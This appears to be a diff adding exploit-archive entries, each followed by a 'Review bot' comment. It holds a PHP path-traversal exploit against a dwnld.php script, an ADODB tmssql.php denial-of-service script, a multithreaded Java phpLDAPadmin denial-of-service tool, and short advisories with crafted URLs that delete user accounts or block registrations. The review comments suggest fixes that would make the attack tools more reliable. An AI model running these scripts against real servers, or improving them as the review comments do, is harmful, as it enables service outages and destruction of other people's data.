global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$_POST[host];
$path=$_POST[path];
$port=$_POST[port];
$num=$_POST[num];
if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
$num=intval(trim($num));
if ($port=='') {$port=80;}
if ($num=='') {$num=100;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
echo ' Try to see if magic_quotes_gpc is enable! ...';
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$test='http://'.$host.$path.'data/test.inc';
if (!include("$test")) {
echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...';
}
else {echo'magic_quotes_gpc is disable. STEP 1:';
for ($n = 1; $n <= $num; $n++) {
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
}
echo' STEP 2:';
for ($n = 1; $n <= 29; $n++) {
if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';}
if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';}
if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';}
if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';}
if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';}
if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';}
if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';}
$packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n";
$packet.="User-Agent: SnoopRob/x.x\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$test2='http://'.$host.$path.'data/stats.dtb';
include("$test2");
if (eregi("1",$html)) {echo "Exploit succeeded"; }
else {echo "Exploit failed...";}
}
else
{echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites<br>
You are responsible for any damage that .... ";}
?>
# milw0rm.com [2006-03-10]
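Review bot: `$proxy` is never read from `$_POST` (only `host`, `path`, `port` and `num` are), so the proxy field in the form is ignored; either wire it up like the other fields or drop it from the form. More important for whoever runs this script: the magic_quotes check and the final verification use `include("$test")` and `include("$test2")` on URLs under the target host, which executes whatever that server returns inside the operator's own PHP process; read the response through `sendpacketii()` into `$html` and test it instead of including it. This copy of `sendpacketii()` also never echoes `$html`, unlike the same helper in the preceding file, so `show()` prints each request but no response is ever displayed.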

platforms/php/dos/1651.php Executable file

@ -0,0 +1,107 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to ADODB\r\n";
echo "redo: how many times?\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
tested against Apache/1.3.27 (Win32) PHP/4.3.3
closelog() func close the connection to the system logger, but if its handle
is never initialized, Windows exception is raised by the php4ts.dll
module at address 0x00000000100bf014.
By sending multiple requests to the tmssql.php script, which allow
execution of an arbitrary function without arguments, this will cause
the Apache process to crash and to consume a large amount of memory
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port."\r\n";
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';
}
}
fputs($ock,$packet);
fclose($ock);
}
$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>
# milw0rm.com [2006-04-09]
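Review bot: in `sendpacketii()` a failed `fsockopen()` only echoes 'No response from ...' and then falls through to `fputs($ock,$packet)` and `fclose($ock)` on `false`; with `error_reporting(0)` the `$redo` loop continues silently for every iteration. Return after the echo, as the proxy branch of the same function already does for an invalid proxy string. The header comment documents the tested platform (Apache/1.3.27 Win32, PHP/4.3.3) but not the PHP versions on which the null-handle `closelog()` behaviour was observed to differ, which is what a reader needs to judge relevance.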

platforms/php/dos/18023.java Executable file

@ -0,0 +1,138 @@
/**
* Exploit Title: phpLDAPadmin 0.9.4b DoS
* Google Dork: "phpLDAPadmin - 0.9.4b"
* Date: 2011-10-23
* Author: Alguien
* Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/
* Version: 0.9.4b
* Tested on: Red Hat
* CVE : -
*
* Compilation:
* ------------
* $ javac phpldos.java
*
* Usage:
* ------
* $ java phpldos <host> <path> <threads>
*
* Example:
* --------
* $ java phpldos www.example.com /phpldapadmin/ 10
*
* Explanation:
* ------------
* The file "common.php" is vulnerable to LFI through the "Accept-Language"
* HTTP header.
*
* if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
* // get the languages which are spetcified in the HTTP header
* $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
* foreach( $HTTP_LANGS2 as $key => $value ) {
* $value=preg_split ("/[-]+/", $value );
* $HTTP_LANGS2[$key]=$value[0];
* }
*
* $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);
* foreach( $HTTP_LANGS as $HTTP_LANG) {
* // try to grab one after the other the language file
* if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&
* is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {
* ob_start();
* include realpath( "lang/recoded/$HTTP_LANG.php" );
* ob_end_clean();
* break;
* }
* }
* }
*
* This exploit sends "../../common" in the Accept-Language header in order to
* generate a recursive inclusions and cause a denial of service via resource
* exhaustion.
*
* GET /phpldapadmin/common.php HTTP/1.1\r\n
* Host: www.example.com\r\n
* Accept-Language: ../../common\r\n
* Connection: close\r\n
* \r\n
*
*/
import java.io.PrintStream;
import java.net.InetSocketAddress;
import java.net.Socket;
class phpldos implements Runnable {
public static final int HTTP_PORT = 80;
public static final int TIMEOUT = 10000;
private static String host;
private static String path;
private Socket sk;
private PrintStream ps;
public void run() {
while (true) {
if (!open_connection()) {
System.out.println("[+] Mission complete. Server is down };]");
break;
}
send_attack();
try {
ps.close();
sk.close();
} catch (Exception e) {
// D'oh!
}
}
}
private boolean open_connection() {
try {
sk = new Socket();
sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);
ps = new PrintStream(sk.getOutputStream());
} catch (Exception e) {
return false;
}
return true;
}
private void send_attack() {
try {
String message = ""
+ "GET " + path + "common.php HTTP/1.1\r\n"
+ "Host: " + host + "\r\n"
+ "Accept-Language: ../../common\r\n"
+ "Connection: close\r\n"
+ "\r\n";
ps.print(message);
} catch (Exception e) {
// D'oh!
}
}
public static void main(String[] args) {
if (args.length != 3) {
usage();
}
host = args[0];
path = args[1];
int threads = Integer.parseInt(args[2]);
System.out.println("[+] Attacking with " + threads + " threads.");
for (int i = 0; i < threads; i++) {
new Thread(new phpldos()).start();
}
}
public static void usage() {
System.out.print(
"###########################################################\n"
+ "# phpLDAPadmin DoS #\n"
+ "# by: Alguien - http://alguienenlafisi.blogspot.com #\n"
+ "###########################################################\n"
+ "Syntax : java phpldos <host> <path> <threads>\n"
+ "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n");
System.exit(1);
}
}
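Review bot: `open_connection()` collapses every exception into `return false`, and `run()` reports that as '[+] Mission complete. Server is down', so an unresolvable host, a firewall drop or the 10 s connect timeout on the very first attempt is reported as success; at minimum distinguish `UnknownHostException` from a later failure. The `Socket` created before a failed `connect()` is never closed. In `main()`, `Integer.parseInt(args[2])` throws an unhandled `NumberFormatException` on a non-numeric thread count, and `usage()` only covers the argument-count case.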

platforms/php/dos/21428.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/4635/info
Messagerie is a web message board application maintained by La Basse.
An issue has been discovered in Messagerie, which could allow an attacker to delete arbitrary user accounts.
Reportedly, submitting a specially crafted URL will successfully remove user accounts.
It should be noted that known usernames of the system is required.
http://www.host.com/supp_membre.php?choix_membre_supp=polom
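Review bot: the entry is filed under `platforms/php/dos`, but the text describes an authorization flaw that lets a crafted request delete arbitrary user accounts, so the impact is loss of accounts rather than loss of service and the entry belongs under `webapps`. No affected Messagerie version is given beyond the BID 4635 reference, and the last sentence ('known usernames of the system is required') should read 'a known username is required'.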

platforms/php/dos/22110.txt Executable file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/6465/info
A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters.
An attacker can exploit this vulnerability by modifying certain parameters when making a request for the modules.php script. This will prevent visitors to the site hosting PHP-Nuke from creating a new account thereby leading to a denial of service vulnerability.
http://target.com/modules.php?name=Your_Account&op=userinfo&uname=
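Review bot: neither an affected PHP-Nuke version nor the input that `modules.php` fails to validate is stated; the text says only 'certain parameters' and the sample URL stops at `uname=` with an empty value, so a reader cannot tell from the entry which condition to check for or what the fix covers. Add the version range from BID 6465 to the header so the entry is usable for patch verification.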

platforms/php/dos/22494.txt Executable file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/7351/info
It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition.
It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected.
product_info.php?products_id=[large amount of random content]
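Review bot: the PoC line `product_info.php?products_id=[large amount of random content]` lacks the `http://target/` prefix the neighbouring txt entries use, and the text says 'several of the osCommerce PHP pages' are affected while only one is listed; state that the line is illustrative. The scope sentence ('2.2cvs was reported vulnerable, previous versions may also be affected') is unconfirmed, as the word 'may' signals, and should be labelled as such rather than read as a tested range.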

Some files were not shown because too many files have changed in this diff.